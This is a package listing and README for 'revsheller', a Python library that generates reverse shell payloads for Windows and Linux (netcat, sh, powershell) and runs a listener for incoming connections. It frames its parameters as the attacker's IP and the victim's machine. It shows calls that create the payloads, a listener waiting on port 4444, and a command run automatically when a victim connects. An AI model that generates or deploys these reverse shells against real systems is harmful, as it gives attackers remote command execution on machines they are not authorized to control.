
revsheller - Easy to generate reverse shells and build a server

pip install revsheller==0.1.0


revsheller - pip revsheller package

Easy to generate reverse shells and build a server.

Note: This package is only for Linux or unix like system.

How to install

Take it easy.

How to use

To create reverse shells

>>> import revsheller as rev
>>> rev.generate(os, mode, ip, port=4444, sh=None, nc_path=None)

os - windows / linux

mode - nc:netcat / sh:shell / powershell

ip - attacker's ip address

port - attacker's port

sh - shell of victim's machine, not required

nc_path - netcat path on victim's machine, not required

Example for windows

>>> rev.generate('windows', 'powershell', '', 4444)

Example for linux / unix

>>> rev.generate('linux', 'sh', '', 4444, sh='/bin/bash')

To wait a connection

>>> revsheller.wait_for_connection(4444)
listening on [any] 4444 ...

To run a command automaticaly when get response

>>> revsheller.wait_for_connection(4444, 'whoami')
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54364